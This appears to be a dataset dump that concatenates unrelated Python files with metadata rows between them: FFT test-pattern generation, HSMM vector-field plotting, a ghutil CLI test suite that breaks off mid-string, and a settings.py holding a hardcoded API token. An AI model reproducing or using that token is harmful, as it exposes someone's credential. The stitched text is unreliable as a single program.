return(np.concatenate((np.zeros(na), r*np.ones(nb))))
def writeFFTForSignal(config,mode,sig,i,nb,signame):
sig = sig / 4.0
fft=scipy.fftpack.fft(sig)
sigfft = sig
fftoutput = fft
if mode == Tools.Q15 or mode == Tools.Q31:
fftoutput = fftoutput * scaling(nb)
maxVal = np.max(np.abs(fft))
sigifft = fft / maxVal / 2.0
ifftoutput = sig / maxVal / 2.0
if mode == Tools.Q15 or mode == Tools.Q31:
ifftoutput = ifftoutput / 4.0
config.writeInput(i, asReal(sigfft),"ComplexInputFFTSamples_%s_%d_" % (signame,nb))
config.writeInput(i, asReal(fftoutput),"ComplexOutputFFTSamples_%s_%d_" % (signame,nb))
config.writeInput(i, asReal(sigifft),"ComplexInputIFFTSamples_%s_%d_" % (signame,nb))
config.writeInput(i, asReal(ifftoutput),"ComplexOutputIFFTSamples_%s_%d_" % (signame,nb))
def writeRFFTForSignal(config,mode,sig,i,nb,signame):
sig = sig / 4.0
rfft=scipy.fft.rfft(sig)
sigfft = sig
fftoutput = rfft
if mode == Tools.Q15 or mode == Tools.Q31:
fftoutput = fftoutput * scaling(int(nb/2))
maxVal = np.max(np.abs(rfft))
sigifft = rfft / maxVal / 2.0
ifftoutput = sig / maxVal / 2.0
if mode == Tools.Q15 or mode == Tools.Q31:
ifftoutput = ifftoutput / 4.0
config.writeInput(i, asReal(sigfft),"RealInputRFFTSamples_%s_%d_" % (signame,nb))
config.writeInput(i, asReal(fftoutput),"ComplexOutputRFFTSamples_%s_%d_" % (signame,nb))
config.writeInput(i, asReal(sigifft),"ComplexInputRIFFTSamples_%s_%d_" % (signame,nb))
config.writeInput(i, asReal(ifftoutput),"RealOutputRIFFTSamples_%s_%d_" % (signame,nb))
def writeCFFTTests(configs):
i = 1
# Write FFT tests for sinusoid
for nb in FFTSIZES:
sig = noisySineSignal(0.05,0.7,nb)
sigc = np.array([complex(x) for x in sig])
for config,mode in configs:
writeFFTForSignal(config,mode,sigc,i,nb,"Noisy")
i = i + 1
# Write FFT tests for step
for nb in FFTSIZES:
sig = stepSignal(0.5,nb)
sigc = np.array([complex(x) for x in sig])
for config,mode in configs:
writeFFTForSignal(config,mode,sigc,i,nb,"Step")
i = i + 1
#############################
# Used for benchmarks
#
## Add a new size for benchmark
BENCHSIZE = 4096
sig = noisySineSignal(0.05,0.7,BENCHSIZE)
sigc = np.array([complex(x) for x in sig])
for config,mode in configs:
writeFFTForSignal(config,mode,sigc,i,BENCHSIZE,"Noisy")
i = i + 1
return(i)
def asReal2D(a):
#return(a.view(dtype=np.float64))
return(a.reshape(np.size(a)).view(dtype=np.float64))
def writeFFT2DForSignal(config,mode,sig,i,rows,cols,signame):
fft=scipy.fft.fftn(sig)
sigfft = sig
fftoutput = fft
sigifft = sig
ifftoutput = scipy.fft.ifftn(sigifft)
if mode == Tools.Q15 or mode == Tools.Q31:
fftoutput = fftoutput * scaling(rows) * scaling(cols)
ifftoutput = ifftoutput / 4.0
config.writeInput(i, asReal2D(sigfft),"ComplexInputFFTSamples_%s_%d_%d_" % (signame,rows,cols))
config.writeInput(i, asReal2D(fftoutput),"ComplexOutputFFTSamples_%s_%d_%d_" % (signame,rows,cols))
config.writeInput(i, asReal2D(sigifft),"ComplexInputIFFTSamples_%s_%d_%d_" % (signame,rows,cols))
config.writeInput(i, asReal2D(ifftoutput),"ComplexOutputIFFTSamples_%s_%d_%d_" % (signame,rows,cols))
def writeCFFT2DTests(configs):
i = 1
# Write FFT2D tests for sinusoid
fr = 10
fc = 10
for (rows,cols) in FFT2DSIZES:
[X, Y] = np.meshgrid(2 * np.pi * np.arange(cols) * fr,
2 * np.pi * np.arange(rows) * fc)
sig = Tools.normalize(np.sin(X) + np.cos(Y) + np.random.uniform(0, 1, X.shape))
sigc = np.array([[complex(y) for y in x] for x in sig])
for config,mode in configs:
writeFFT2DForSignal(config,mode,sigc,i,rows,cols,"Noisy")
i = i + 1
#############################
# Used for benchmarks
#
## Add a new size for benchmark
BENCHSIZE = 4096
sig = noisySineSignal(0.05,0.7,BENCHSIZE)
sigc = np.array([complex(x) for x in sig])
for config,mode in configs:
writeFFT2DForSignal(config,mode,sigc,i,64,64,"Noisy")
i = i + 1
return(i)
def writeRFFTTests(configs):
i = 1
# Write FFT tests for sinusoid
for nb in REALFFTSIZES:
sig = noisySineSignal(0.05,0.7,nb)
for config,mode in configs:
writeRFFTForSignal(config,mode,sig,i,nb,"Noisy")
i = i + 1
# Write FFT tests for step
for nb in REALFFTSIZES:
sig = stepSignal(0.5,nb)
for config,mode in configs:
writeRFFTForSignal(config,mode,sig,i,nb,"Step")
i = i + 1
#############################
# Used for benchmarks
#
## Add a new size for benchmark
BENCHSIZE = 4096
sig = noisySineSignal(0.05,0.7,BENCHSIZE)
for config,mode in configs:
writeRFFTForSignal(config,mode,sig,i,BENCHSIZE,"Noisy")
i = i + 1
return(i)
def generatePatterns():
PATTERNDIR = os.path.join(args.f,"Patterns","DSP","FFT","CFFT","CFFT")
PARAMDIR = os.path.join(args.f,"Parameters","DSP","FFT","CFFT","CFFT")
configf64=Tools.Config(PATTERNDIR,PARAMDIR,"f64")
configf32=Tools.Config(PATTERNDIR,PARAMDIR,"f32")
configf16=Tools.Config(PATTERNDIR,PARAMDIR,"f16")
configq31=Tools.Config(PATTERNDIR,PARAMDIR,"q31")
configq15=Tools.Config(PATTERNDIR,PARAMDIR,"q15")
print("CFFT")
allConfigs=[(configf64,Tools.F64),
(configf32,Tools.F32),
(configf16,Tools.F16),
(configq31,Tools.Q31),
(configq15,Tools.Q15)]
writeCFFTTests(allConfigs)
PATTERNDIR = os.path.join(args.f,"Patterns","DSP","FFT","CFFT2D","CFFT2D")
PARAMDIR = os.path.join(args.f,"Parameters","DSP","FFT","CFFT2D","CFFT2D")
configf64=Tools.Config(PATTERNDIR,PARAMDIR,"f64")
configf32=Tools.Config(PATTERNDIR,PARAMDIR,"f32")
configf16=Tools.Config(PATTERNDIR,PARAMDIR,"f16")
configq31=Tools.Config(PATTERNDIR,PARAMDIR,"q31")
configq15=Tools.Config(PATTERNDIR,PARAMDIR,"q15")
print("CFFT2D")
allConfigs=[(configf64,Tools.F64),
(configf32,Tools.F32),
(configf16,Tools.F16),
(configq31,Tools.Q31),
(configq15,Tools.Q15)]
writeCFFT2DTests(allConfigs)
PATTERNDIR = os.path.join(args.f,"Patterns","DSP","FFT","RFFT","RFFT")
PARAMDIR = os.path.join(args.f,"Parameters","DSP","FFT","RFFT","RFFT")
configf64=Tools.Config(PATTERNDIR,PARAMDIR,"f64")
configf32=Tools.Config(PATTERNDIR,PARAMDIR,"f32")
configf16=Tools.Config(PATTERNDIR,PARAMDIR,"f16")
configq31=Tools.Config(PATTERNDIR,PARAMDIR,"q31")
configq15=Tools.Config(PATTERNDIR,PARAMDIR,"q15")
print("RFFT")
allConfigs=[(configf64,Tools.F64),
(configf32,Tools.F32),
(configf16,Tools.F16),
(configq31,Tools.Q31),
(configq15,Tools.Q15)]
writeRFFTTests(allConfigs)
if __name__ == '__main__':
generatePatterns() | 74.852601 | 15,892 | 0.547241 | 5,477 | 25,899 | 2.578419 | 0.056418 | 0.579805 | 0.869282 | 1.158476 | 0.795921 | 0.781476 | 0.778077 | 0.767667 | 0.767667 | 0.734669 | 0 | 0.410933 | 0.235723 | 25,899 | 346 | 15,893 | 74.852601 | 0.302516 | 0.062667 | 0 | 0.445 | 0 | 0 | 0.029543 | 0.015331 | 0 | 0 | 0 | 0 | 0 | 1 | 0.08 | false | 0 | 0.04 | 0.03 | 0.12 | 0.015 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 11 |
23c159fe01ab1b8f0d25719a163608355b6478e6 | 128 | py | Python | settings.py | omax83/strorinWind | b404dc4f78552b0f059c6be53db54d59eaeec977 | [
"Apache-2.0"
] | null | null | null | settings.py | omax83/strorinWind | b404dc4f78552b0f059c6be53db54d59eaeec977 | [
"Apache-2.0"
] | null | null | null | settings.py | omax83/strorinWind | b404dc4f78552b0f059c6be53db54d59eaeec977 | [
"Apache-2.0"
] | null | null | null | token = '163ff31a1a31ca439673ce1eb9726118fb48bfcacf32a0296ebc46c2c3a2016f438ac710b876e8c72f0f8'
confirmation_token = '13507e18'
| 42.666667 | 95 | 0.90625 | 5 | 128 | 23 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.483607 | 0.046875 | 128 | 2 | 96 | 64 | 0.459016 | 0 | 0 | 0 | 0 | 0 | 0.726563 | 0.664063 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
9b0602851695da18f2b1cd70afb70c0d913c36f6 | 14,120 | py | Python | src/behdata/pyhsmm/plot.py | ekellbuch/behdata | 4f2ebf60005cef9389a46c973f546ea006aefc7c | [
"MIT"
] | null | null | null | src/behdata/pyhsmm/plot.py | ekellbuch/behdata | 4f2ebf60005cef9389a46c973f546ea006aefc7c | [
"MIT"
] | null | null | null | src/behdata/pyhsmm/plot.py | ekellbuch/behdata | 4f2ebf60005cef9389a46c973f546ea006aefc7c | [
"MIT"
] | null | null | null | import numpy as np
import matplotlib
import matplotlib.pyplot as plt
import seaborn as sns
import os
color_names = [
"red",
"windows blue",
"medium green",
"dusty purple",
"orange",
"amber",
"clay",
"pink",
"greyish",
"light cyan",
"steel blue",
"forest green",
"pastel purple",
"mint",
"salmon",
"dark brown",
]
colors = sns.xkcd_palette(color_names)
def plot_vector_field_dynamics(
Aks,
bks,
comb_obs=None,
xlim=(-3, 3),
ylim=(-3, 3),
sharey=True,
sharex=True,
nxpts=20,
nypts=20,
FIGURE_STORE=False,
OUTDIR="",
fname=None,
plot_center=False,
):
if comb_obs is None:
comb_obs = [(0, 1)]
x = np.linspace(*xlim, nxpts)
y = np.linspace(*ylim, nypts)
X, Y = np.meshgrid(x, y)
xy = np.column_stack((X.ravel(), Y.ravel()))
fig, ax = plt.subplots(
len(comb_obs),
len(Aks),
figsize=(len(Aks) * 4, len(comb_obs) * 4),
sharey=sharey,
sharex=sharex,
)
if np.ndim(ax) == 1:
ax = ax[None, :]
# State indices the columns
for state, (Ak, bk) in enumerate(zip(Aks, bks)):
# Select pair of coordinates
for pair_id, cpair in enumerate(comb_obs):
As = Ak[np.ix_(cpair, cpair)]
bs = bk[np.ix_(cpair)]
# dydt_m = xy.dot(A.T) + b.T - xy
dydt_m = xy.dot(As.T) + bs.T - xy
ax[pair_id, state].quiver(
xy[:, 0],
xy[:, 1],
dydt_m[:, 0],
dydt_m[:, 1],
color=colors[state % len(colors)],
headwidth=5.0,
)
# ax[pair_id, state].set_title(
# "$A_{} x_{{t, {}{}}} + b_{} - x_t$".format(state + 1,
# cpair[0],
# cpair[1],
# state + 1)
# )
if plot_center:
try:
center = -np.linalg.solve(As-np.eye(As.shape[1]), bs)
ax.plot(center[0],
center[1], 'o', color=colors[state % len(colors)],
markersize=4)
except:
print("Dynamics are not invertible!")
ax[pair_id, state].set_title(
"$A_{} x_t + b_{} - x_t$".format(state + 1, state + 1)
)
ax[pair_id, state].set_xlabel("$x_{{t, {} }}$".format(cpair[0]))
# share y
ax[pair_id, 0].set_ylabel("$x_{{t, {} }}$".format(cpair[1]))
plt.tight_layout()
if FIGURE_STORE:
if fname is None:
fname = "Vector Field Dynamics.pdf"
plt.savefig(os.path.join(OUTDIR, fname))
else:
plt.show()
#plt.close()
return
def plot_vector_field_dynamics_formatted(
Aks,
bks,
num_states,
comb_obs=None,
num_cols=3,
states_order=[],
plot_center=True,
xlim=(-5, 5),
ylim=(-5, 5),
sharey=True,
sharex=True,
nxpts=10,
nypts=10,
fontsize=12,
figsize=(9,5),
FIGURE_STORE=False,
OUTDIR="",
fname=None,
):
if comb_obs is None:
comb_obs = [(0, 1)]
x = np.linspace(*xlim, nxpts)
y = np.linspace(*ylim, nypts)
X, Y = np.meshgrid(x, y)
xy = np.column_stack((X.ravel(), Y.ravel()))
from math import ceil
fig, axarr = plt.subplots(
ceil(num_states/num_cols),
num_cols,
figsize=figsize,
sharey=sharey,
sharex=sharex,
)
if np.ndim(axarr) == 1:
axarr = axarr[None, :]
axarr = axarr.flatten()
for ii, ax in enumerate(axarr):
if ii >= num_states:
ax.axis('off')
if not np.any(states_order):
states_order = np.arange(num_states)
else:
assert len(np.unique(states_order)) == num_states
# State indices the columns
for state_id, (state, ax) in enumerate(zip(states_order, axarr)):
Ak = Aks[state]
bk = bks[state]
# Select pair of coordinates
for pair_id, cpair in enumerate(comb_obs):
As = Ak[np.ix_(cpair, cpair)]
bs = bk[np.ix_(cpair)]
# dydt_m = xy.dot(A.T) + b.T - xy
dydt_m = xy.dot(As.T) + bs.T - xy
ax.quiver(
xy[:, 0],
xy[:, 1],
dydt_m[:, 0],
dydt_m[:, 1],
color=colors[state % len(colors)],
headwidth=5.0,
)
if plot_center:
try:
center = -np.linalg.solve(As-np.eye(As.shape[1]), bs)
ax.plot(center[0],
center[1],
'o',
color=colors[state % len(colors)],
markersize=6)
except:
print("Dynamics are not invertible!")
ax.set_title(
"$A_{} x_t + b_{} - x_t$".format(state + 1, state + 1), fontsize=fontsize)
ax.set_xlabel("$x_{{t, {} }}$".format(cpair[0]),
fontsize=fontsize, labelpad=10)
# share y
ax.set_ylabel("$x_{{t, {} }}$".format(cpair[1]),
fontsize=fontsize, labelpad=10)
# set, xy lims
#ax.set_xlim(xlim)
#ax.set_ylim(ylim)
ax.set_xticks([])
ax.set_yticks([])
plt.tight_layout()
if FIGURE_STORE:
if fname is None:
fname = "Vector Field Dynamics.pdf"
plt.savefig(os.path.join(OUTDIR, fname))
else:
plt.show()
#plt.close()
return
def plot_vector_field_dynamics_data(
Aks,
bks,
data,
states,
comb_obs=None,
sharey=True,
sharex=True,
FIGURE_STORE=False,
OUTDIR="",
fontsize=10,
fname=None,
):
# single data set
if comb_obs is None:
comb_obs = [(0, 1)]
matplotlib.rcParams.update({'font.size': fontsize})
fig, ax = plt.subplots(
len(comb_obs),
len(Aks),
figsize=(len(Aks) * 4, len(comb_obs) * 4),
sharey=sharey,
sharex=sharex,
)
if np.ndim(ax) == 1:
ax = ax[None, :]
# State indices the columns
for state, (Ak, bk) in enumerate(zip(Aks, bks)):
# Select pair of coordinates
x_t = data[states == state, :]
if not np.any(x_t):
print('No data with states {}'.format(state))
continue
for pair_id, cpair in enumerate(comb_obs):
As = Ak[np.ix_(cpair, cpair)]
bs = bk[np.ix_(cpair)]
xy = x_t[:, cpair]
dydt_m = xy.dot(As.T) + bs.T - xy
ax[pair_id, state].quiver(
xy[:, 0],
xy[:, 1],
dydt_m[:, 0],
dydt_m[:, 1],
color=colors[state % len(colors)],
headwidth=5.0,
)
# ax[pair_id, state].set_title(
# "$A_{} x_{{t, {}{}}} + b_{} - x_t$".format(state + 1,
# cpair[0],
# cpair[1],
# state + 1)
# )
ax[pair_id, state].set_title(
"$A_{} x_t + b_{} - x_t$".format(state + 1, state + 1)
)
# share x
ax[pair_id, state].set_xlabel("$x_{{t, {} }}$".format(cpair[0]))
# share y
ax[pair_id, 0].set_ylabel("$x_{{t, {} }}$".format(cpair[1]))
plt.tight_layout()
if FIGURE_STORE:
if fname is None:
fname = "Vector Field Dynamics on Inputs.pdf"
plt.savefig(os.path.join(OUTDIR, fname))
else:
plt.show()
plt.close()
return
def plot_vector_field_dynamics_datas(
Aks,
bks,
datas,
states,
comb_obs=None,
sharey=True,
sharex=True,
FIGURE_STORE=False,
OUTDIR="",
fname=None,
):
# if you see an error check if you should be running datas instead
if comb_obs is None:
comb_obs = [(0, 1)]
fig, ax = plt.subplots(
len(comb_obs),
len(Aks),
figsize=(len(Aks) * 4, len(comb_obs) * 4),
sharey=sharey,
sharex=sharex,
)
if np.ndim(ax) == 1:
ax = ax[None, :]
for data_id, (data, dstates) in enumerate(zip(datas, states)):
# State indices the columns
print(' Plotting for data set {}'.format(data_id))
for state, (Ak, bk) in enumerate(zip(Aks, bks)):
# Select pair of coordinates
x_t = data[dstates == state, :]
# drop nan
bad = np.isnan(x_t).any(1)
x_t = x_t[~bad]
if not np.any(x_t):
print('No data with states {}'.format(state))
continue
for pair_id, cpair in enumerate(comb_obs):
As = Ak[np.ix_(cpair, cpair)]
bs = bk[np.ix_(cpair)]
xy = x_t[:, cpair]
dydt_m = xy.dot(As.T) + bs.T - xy
ax[pair_id, state].quiver(
xy[:, 0],
xy[:, 1],
dydt_m[:, 0],
dydt_m[:, 1],
color=colors[state % len(colors)],
headwidth=5.0,
)
# ax[pair_id, state].set_title(
# "$A_{} x_{{t, {}{}}} + b_{} - x_t$".format(state + 1,
# cpair[0],
# cpair[1],
# state + 1)
# )
ax[pair_id, state].set_title(
"$A_{} x_t + b_{} - x_t$".format(state + 1, state + 1)
)
# share x
ax[pair_id, state].set_xlabel("$x_{{t, {} }}$".format(cpair[0]))
# share y
ax[pair_id, 0].set_ylabel("$x_{{t, {} }}$".format(cpair[1]))
plt.tight_layout()
if FIGURE_STORE:
if fname is None:
fname = "Vector Field Dynamics on Inputs.pdf"
plt.savefig(os.path.join(OUTDIR, fname))
else:
plt.show()
plt.close()
return
def plot_vector_field_dynamics_datas_formatted(
Aks,
bks,
datas,
states,
num_states,
num_cols=3,
plot_center=True,
fontsize=12,
comb_obs=None,
sharey=True,
figsize=(9, 5),
sharex=False,
states_order=[],
FIGURE_STORE=False,
OUTDIR="",
fname=None,
):
# if you see an error check if you should be running datas instead
if comb_obs is None:
comb_obs = [(0, 1)]
matplotlib.rcParams.update({'font.size': fontsize})
from math import ceil
fig, axarr = plt.subplots(
ceil(num_states/num_cols),
num_cols,
figsize=figsize,
sharey=sharey,
sharex=sharex,
)
if np.ndim(axarr) == 1:
axarr = axarr[None, :]
axarr = axarr.flatten()
for ii, ax in enumerate(axarr):
if ii >= num_states:
ax.axis('off')
if not np.any(states_order):
states_order = np.arange(num_states)
else:
assert len(np.unique(states_order)) == num_states
for data_id, (data, dstates) in enumerate(zip(datas, states)):
# State indices the columns
print(' Plotting for data set {}'.format(data_id))
for state, ax in zip(states_order, axarr):
Ak = Aks[state]
bk = bks[state]
print('Plotting state {}'.format(state))
#ax = axarr[state]
# Select pair of coordinates
x_t = data[dstates == state, :]
bad = np.isnan(x_t).any(1)
x_t = x_t[~bad]
if not np.any(x_t):
print('No data with states {}'.format(state))
continue
for pair_id, cpair in enumerate(comb_obs):
As = Ak[np.ix_(cpair, cpair)]
bs = bk[np.ix_(cpair)]
xy = x_t[:, cpair]
dydt_m = xy.dot(As.T) + bs.T - xy
ax.quiver(
xy[:, 0],
xy[:, 1],
dydt_m[:, 0],
dydt_m[:, 1],
color=colors[state % len(colors)],
headwidth=5.0,
)
if plot_center:
try:
center = -np.linalg.solve(As-np.eye(As.shape[1]), bs)
ax.plot(center[0],
center[1], 'o', color=colors[state % len(colors)],
markersize=5
)
except:
print("Dynamics are not invertible!")
ax.set_title(
"$A_{} x_t + b_{} - x_t$".format(state + 1,
state+1),
fontsize=fontsize)
#ax.set_title('State z={}'.format(state + 1))
#ax.set_title()
#if state % num_cols == 0:
ax.set_xlabel("$x_{t,1}$", fontsize=fontsize, labelpad=10)
ax.set_ylabel("$x_{t,2}$", fontsize=fontsize, labelpad=10)
ax.tick_params(labelsize=fontsize)
ax.set_xticks([])
ax.set_yticks([])
plt.tight_layout()
if FIGURE_STORE:
if fname is None:
fname = "Vector Field Dynamics on Inputs.pdf"
plt.savefig(os.path.join(OUTDIR, fname))
else:
plt.show()
#plt.close()
return | 27.364341 | 90 | 0.447875 | 1,635 | 14,120 | 3.724159 | 0.118043 | 0.013467 | 0.021022 | 0.02562 | 0.870915 | 0.836262 | 0.826244 | 0.808343 | 0.808343 | 0.799639 | 0 | 0.01686 | 0.420326 | 14,120 | 516 | 91 | 27.364341 | 0.727062 | 0.105453 | 0 | 0.807388 | 0 | 0 | 0.061521 | 0 | 0 | 0 | 0 | 0 | 0.005277 | 1 | 0.013193 | false | 0 | 0.01847 | 0 | 0.044855 | 0.023747 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
f1d56e186e9da1d6624de60c0c21172aa7a87643 | 35,462 | py | Python | test/test_cli_issue.py | jwodder/ghutil | f0b903a76177cd49f5d48ac9890609f4da9071d9 | [
"MIT"
] | 6 | 2017-05-29T19:29:44.000Z | 2020-04-05T00:01:02.000Z | test/test_cli_issue.py | jwodder/ghutil | f0b903a76177cd49f5d48ac9890609f4da9071d9 | [
"MIT"
] | 2 | 2017-06-29T09:39:32.000Z | 2020-01-07T22:48:02.000Z | test/test_cli_issue.py | jwodder/ghutil | f0b903a76177cd49f5d48ac9890609f4da9071d9 | [
"MIT"
] | 1 | 2017-06-11T16:43:47.000Z | 2017-06-11T16:43:47.000Z | import json
import os
from pathlib import Path
import webbrowser
import click
import pytest
FILEDIR = Path(__file__).with_name('data') / 'files'
LOREM = "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.\n"
READ_ISSUE = '''\
Issue: click plugins / cache / local datastore
State: open
Author: roscopecoltran
Date: 2017-06-29 05:39:32 -0400 (last updated 2017-06-29 12:33:16 -0400)
Labels: Nice to Have
Assignees: \n
Hi,
Hope u are all well !
Was wondering if adding click's plugins or pluggy as a feature for ghutil was on your roadmap. It would allow to be non-intrusive for some external plugins if we could define a plugin registry via a yaml file.
From my perspective, I just wanted to extend the use of some ghutil "repos" related command (eg. repos starred) and to append some meta-data (mainly in Json/YAML format) from different sources:
Additional info from github api:
- Add topics for any repo related queries
- Add readme for starred repo for indexation
- Add files list per branch for making faster any source code sifting, pattern matching
examples of plugins for a cached registry of enhanced meta data:
- https://github.com/thombashi/ghscard (mainly to build a chrome extension and some hover cards"
- https://github.com/asciimoo/searx
- https://github.com/nexB/scancode-toolkit
- https://github.com/GitMarkTeam/gitmark
- https://github.com/douban/linguist
- https://github.com/porter-io/tagg-python
Ideally, I wanted to complete a **ghutil** with a local datastore, sqlite or mysql, and, later on, I will had some classifiers on gh topics attributes with gensim/elastic search but that's another milestone ^^.
Any feedback or inputs are welcomed, have a great day !
Cheers,
Richard
comment 312021247
Author: jwodder
Date: 2017-06-29 12:31:32 -0400
I do not currently have any plans for supporting plugins, and any such plans would be very far down on my to-do list for this project.
'''
def test_issue_read_issue(cmd):
r = cmd('issue', 'read', 'ghutil/1')
assert r.exit_code == 0
assert r.output == READ_ISSUE
def test_pr_read_issue(cmd):
r = cmd('pr', 'read', 'ghutil/1')
assert r.exit_code == 0
assert r.output == READ_ISSUE
READ_CLOSED_ISSUE = '''\
Issue: support git refs in @ syntax
State: closed
Author: zzzeek
Date: 2016-07-26 19:27:19 -0400 (last updated 2017-04-08 06:21:30 -0400)
Labels: \nAssignees: \nMilestone: 10.0
Closed: 2017-04-08 06:21:04 -0400 by xavfernandez
Reactions: 👍 5
We'd like to be able to put paths to gerrit reviews in requirements files.
Given a gerrit like https://review.openstack.org/#/c/345601/6, the path given for a git pull looks like:
git pull https://git.openstack.org/openstack/oslo.db refs/changes/01/345601/6
pip syntax we'd expect would be:
```
.venv/bin/pip install -e git+https://git.openstack.org/openstack/oslo.db@refs/changes/01/345601/6#egg=oslo.db
```
current output:
```
Obtaining oslo.db from git+https://git.openstack.org/openstack/oslo.db@refs/changes/01/345601/6#egg=oslo.db
Cloning https://git.openstack.org/openstack/oslo.db (to refs/changes/01/345601/6) to ./.venv/src/oslo.db
Could not find a tag or branch 'refs/changes/01/345601/6', assuming commit.
error: pathspec 'refs/changes/01/345601/6' did not match any file(s) known to git.
Command "git checkout -q refs/changes/01/345601/6" failed with error code 1 in /home/classic/.venv/src/oslo.db
```
comment 268571420
Author: pradyunsg
Date: 2016-12-21 11:44:43 -0500 (last updated 2016-12-21 11:44:54 -0500)
@sshnaidm Please use Github reactions. They're meant for exactly this.
'''
def test_issue_read_closed_issue(cmd):
r = cmd('issue', 'read', 'pypa/pip/3876')
assert r.exit_code == 0
assert r.output == READ_CLOSED_ISSUE
def test_pr_read_closed_issue(cmd):
r = cmd('pr', 'read', 'pypa/pip/3876')
assert r.exit_code == 0
assert r.output == READ_CLOSED_ISSUE
def test_issue_list_pypa_packaging(cmd):
r = cmd('issue', 'list', 'pypa/packaging')
assert r.exit_code == 0
assert r.output == '''\
pypa/packaging/111
pypa/packaging/109
pypa/packaging/108
pypa/packaging/107
pypa/packaging/106
pypa/packaging/101
pypa/packaging/100
pypa/packaging/99
pypa/packaging/95
pypa/packaging/92
pypa/packaging/90
pypa/packaging/88
pypa/packaging/87
pypa/packaging/86
pypa/packaging/84
pypa/packaging/83
pypa/packaging/82
pypa/packaging/81
pypa/packaging/74
pypa/packaging/34
'''
def test_issue_list_milestone(cmd):
r = cmd('issue', 'list', 'pypa/pip', '-m', 'Improve User Experience')
assert r.exit_code == 0
assert r.output == '''\
pypa/pip/4685
pypa/pip/4649
pypa/pip/4575
pypa/pip/1668
'''
def test_issue_list_milestone_label(cmd):
r = cmd(
'issue', 'list',
'pypa/pip',
'-m', 'Improve User Experience',
'-l', 'discussion needed',
)
assert r.exit_code == 0
assert r.output == '''\
pypa/pip/4685
pypa/pip/4649
pypa/pip/4575
'''
def test_issue_list_milestone_two_labels(cmd):
r = cmd(
'issue', 'list',
'pypa/pip',
'-m', 'Improve User Experience',
'-l', 'discussion needed',
'-l', 'topic - user-scheme',
)
assert r.exit_code == 0
assert r.output == 'pypa/pip/4575\n'
def test_issue_show_issue(cmd):
r = cmd('issue', 'show', 'ghutil/1')
assert r.exit_code == 0
assert r.output == '''\
[
{
"assignees": [],
"body": "Hi,\\r\\n\\r\\nHope u are all well !\\r\\n\\r\\nWas wondering if adding click's plugins or pluggy as a feature for ghutil was on your roadmap. It would allow to be non-intrusive for some external plugins if we could define a plugin registry via a yaml file.\\r\\n\\r\\nFrom my perspective, I just wanted to extend the use of some ghutil \\"repos\\" related command (eg. repos starred) and to append some meta-data (mainly in Json/YAML format) from different sources:\\r\\n\\r\\nAdditional info from github api:\\r\\n- Add topics for any repo related queries\\r\\n- Add readme for starred repo for indexation\\r\\n- Add files list per branch for making faster any source code sifting, pattern matching\\r\\n\\r\\nexamples of plugins for a cached registry of enhanced meta data:\\r\\n- https://github.com/thombashi/ghscard (mainly to build a chrome extension and some hover cards\\"\\r\\n- https://github.com/asciimoo/searx\\r\\n- https://github.com/nexB/scancode-toolkit\\r\\n- https://github.com/GitMarkTeam/gitmark\\r\\n- https://github.com/douban/linguist\\r\\n- https://github.com/porter-io/tagg-python\\r\\n\\r\\nIdeally, I wanted to complete a **ghutil** with a local datastore, sqlite or mysql, and, later on, I will had some classifiers on gh topics attributes with gensim/elastic search but that's another milestone ^^.\\r\\n\\r\\nAny feedback or inputs are welcomed, have a great day !\\r\\n\\r\\nCheers,\\r\\nRichard",
"closed_at": null,
"closed_by": null,
"comments": 1,
"created_at": "2017-06-29T09:39:32Z",
"html_url": "https://github.com/jwodder/ghutil/issues/1",
"id": 239420922,
"labels": [
"Nice to Have"
],
"locked": false,
"milestone": null,
"number": 1,
"reactions": {},
"state": "open",
"title": "click plugins / cache / local datastore",
"updated_at": "2017-06-29T16:33:16Z",
"url": "https://api.github.com/repos/jwodder/ghutil/issues/1",
"user": "roscopecoltran"
}
]
'''
def test_issue_show_pr(cmd):
r = cmd('issue', 'show', 'vinta/awesome-python/875')
assert r.exit_code == 0
assert r.output == '''\
[
{
"assignees": [],
"body": "## What is this Python project?\\r\\n\\r\\n`attrs` allows you to declare your class's instance attributes once, and it then takes care of generating the boilerplate `__init__`, `__eq__`, `__repr__`, etc. methods for you, turning this:\\r\\n\\r\\n```\\r\\nfrom functools import total_ordering\\r\\n@total_ordering\\r\\nclass Point3D(object):\\r\\n def __init__(self, x, y, z):\\r\\n self.x = x\\r\\n self.y = y\\r\\n self.z = z\\r\\n\\r\\n def __repr__(self):\\r\\n return (self.__class__.__name__ +\\r\\n (\\"(x={}, y={}, z={})\\".format(self.x, self.y, self.z)))\\r\\n\\r\\n def __eq__(self, other):\\r\\n if not isinstance(other, self.__class__):\\r\\n return NotImplemented\\r\\n return (self.x, self.y, self.z) == (other.x, other.y, other.z)\\r\\n\\r\\n def __lt__(self, other):\\r\\n if not isinstance(other, self.__class__):\\r\\n return NotImplemented\\r\\n return (self.x, self.y, self.z) < (other.x, other.y, other.z)\\r\\n```\\r\\n\\r\\ninto this:\\r\\n\\r\\n```\\r\\nimport attr\\r\\n@attr.s\\r\\nclass Point3D(object):\\r\\n x = attr.ib()\\r\\n y = attr.ib()\\r\\n z = attr.ib()\\r\\n```\\r\\n\\r\\nExample taken from [this blog post extolling 